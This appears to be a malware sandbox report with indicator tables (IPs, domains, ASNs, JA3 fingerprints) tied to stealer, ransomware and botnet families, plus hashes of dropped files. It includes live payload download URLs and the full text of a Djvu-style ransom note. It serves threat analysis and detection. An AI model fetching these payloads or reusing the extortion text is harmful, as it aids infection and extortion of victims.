	SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.167/lend/alexxxxxxxx.exe
	uQeIMs91Vh.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	193.233.132.167/retro/random.exe
	Vjt694rffx.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	193.233.132.167/cost/go.exe
	SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.167/cost/go.exe
	SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.167/enigma/index.php?wal=1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sdfjhuz.com	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	189.195.132.134
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	148.230.249.9
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	185.18.245.58
	fx28wfnZ4J.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader, SmokeLoader	Browse	186.182.55.44
	ouTBFyJGN3.exe	Get hash	malicious	Djvu, PrivateLoader, Vidar	Browse	190.145.136.42
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.143.202.242
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	175.119.10.231
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	186.13.17.220
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	201.103.73.225
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	211.181.24.132
cajgtus.com	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	187.170.192.109
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	187.143.58.5
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	125.7.253.10
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	84.252.15.104
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	123.212.43.225
	fx28wfnZ4J.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader, SmokeLoader	Browse	190.13.174.94
	file.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader	Browse	109.175.29.39
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	211.171.233.129
	XV9q6mY4DI.exe	Get hash	malicious	Babuk, Djvu	Browse	95.86.30.3
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	211.119.84.111
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	23.210.122.61
	https://bitly.cx/LmuIz	Get hash	malicious	Unknown	Browse	104.102.42.29
	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse	23.67.133.187
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	23.67.133.187
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.199.218.33
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	104.102.42.29
nessotechbd.com	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	192.185.16.114
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	192.185.16.114
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	192.185.16.114
	fx28wfnZ4J.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader, SmokeLoader	Browse	192.185.16.114
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	192.185.16.114
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	192.185.16.114
	MdeeRbWvqe.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	192.185.16.114
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	192.185.16.114
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	192.185.16.114
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	192.185.16.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	http://moctle.com/	Get hash	malicious	Unknown	Browse	103.160.204.248
	iFTZfjcn8I.elf	Get hash	malicious	Mirai	Browse	103.189.218.39
	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	103.174.152.66
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	103.174.152.66
	bot.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	157.85.122.36
	Ref_FTD431100.xls	Get hash	malicious	Remcos	Browse	103.186.117.184
	gJlGkncVHO.elf	Get hash	malicious	Mirai, Moobot	Browse	157.85.169.243
	j55aXfhPv3.elf	Get hash	malicious	Mirai, Moobot	Browse	157.85.110.49
	file.exe	Get hash	malicious	CMSBrute	Browse	103.166.184.214
	HSBC $13560!#COPY.bat.exe	Get hash	malicious	AgentTesla	Browse	103.164.173.46
ALABANZA-BALTUS	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse	65.109.242.59
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	65.109.242.59
	bogotune_bdb	Get hash	malicious	Unknown	Browse	64.176.196.183
	aspell	Get hash	malicious	Unknown	Browse	64.176.196.183
	SecuriteInfo.com.W32.MSIL_Kryptik.KZR.gen.Eldorado.14377.22773.exe	Get hash	malicious	AgentTesla	Browse	65.109.115.215
	TYxryaQOKO.elf	Get hash	malicious	Mirai	Browse	216.147.52.145
UninetSAdeCVMX	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	201.115.242.127
	6a7R9UXFMM.elf	Get hash	malicious	Mirai	Browse	201.108.153.230
	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	187.170.192.109
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	187.143.58.5
	6uBxa0vGQt.elf	Get hash	malicious	Gafgyt	Browse	187.154.84.205
	Xi102MnZby.elf	Get hash	malicious	Mirai	Browse	189.162.156.233
	UTHyAUOVPD.elf	Get hash	malicious	Mirai	Browse	187.236.73.135
	S4kCacU4pQ.elf	Get hash	malicious	Gafgyt, Mirai	Browse	189.229.88.234
	qwmLv2FcgD.elf	Get hash	malicious	Unknown	Browse	148.212.20.244
	tato tu_.msg	Get hash	malicious	Unknown	Browse	187.218.53.183
AKAMAI-ASUS	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	23.36.242.165
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse	104.102.42.29
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	23.210.122.61
	VWOm7n5MsV.elf	Get hash	malicious	Unknown	Browse	23.74.215.189
	https://bitly.cx/LmuIz	Get hash	malicious	Unknown	Browse	104.102.42.29
	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse	2.16.202.91
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	6T1S0q3QLa.elf	Get hash	malicious	Mirai	Browse	88.221.138.6
FREE-NET-ASFREEnetEU	YvF8xPbiml.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.126
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse	147.45.47.126
	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	193.233.132.167
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	193.233.132.167
	SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exe	Get hash	malicious	PureLog Stealer	Browse	147.45.47.149
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	147.45.47.126
	lgX7lgUL1w.exe	Get hash	malicious	Neoreklami, PureLog Stealer, SmokeLoader	Browse	147.45.47.149
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	147.45.47.126
	SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse	147.45.47.149
	SecuriteInfo.com.Trojan.PWS.RisePro.156.1977.119.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.126

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	YvF8xPbiml.exe	Get hash	malicious	RisePro Stealer	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	swift.xls	Get hash	malicious	Unknown	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	NFs_468.msi	Get hash	malicious	VMdetect	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	https://proviaproducts-my.sharepoint.com/:b:/g/personal/bob_rossi_provia_com/EadoUKaCx_pLpRRZlPhQBbkBX2-aayjJ2XxHM4MjJFfXkA?e=7rg6fP	Get hash	malicious	Unknown	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xls	Get hash	malicious	Unknown	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	IT1_Individual_Resident_Return_XLS.zip	Get hash	malicious	Unknown	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
	https://degroofpetercam.sharefile.eu/f/foeaa098-ab4a-4383-832f-352520075f87?a=adfc24f975fb17a5	Get hash	malicious	Unknown	Browse	104.196.109.209 103.174.152.66 192.185.16.114 162.159.134.233
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	65.109.242.59
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	65.109.242.59
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe	Get hash	malicious	CryptOne, Vidar	Browse	65.109.242.59
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exe	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3
	SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exe	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 188.114.96.3
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 188.114.96.3
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 188.114.96.3
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 188.114.96.3
	SecuriteInfo.com.Win32.Malware-gen.16925.17124.dll	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3
	SecuriteInfo.com.Win32.Malware-gen.16925.17124.dll	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1316618.2567.8320.exe	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3
	GU_9288409388723.msi	Get hash	malicious	Unknown	Browse	104.102.42.29 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\EGIJEBGDAFHI\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	btCbrSS2Je.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\EGIJEBGDAFHI\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	btCbrSS2Je.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\$WinREAgent\Scratch\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.893644520875933
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
MD5:	B65D7C11FCF0D75B3E599B80543A852D
SHA1:	D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
SHA-256:	D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
SHA-512:	EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\$WinREAgent\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.893644520875933
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
MD5:	B65D7C11FCF0D75B3E599B80543A852D
SHA1:	D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
SHA-256:	D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
SHA-512:	EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\ProgramData\EGIJEBGDAFHI\AFBKKF

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\BGHJEB

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\BKECBA

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\DAKFCG

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\DAKFCG-shm

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\DHCBAE

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\EHJDGH

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\EHJDGH-shm

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\GIJECG

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
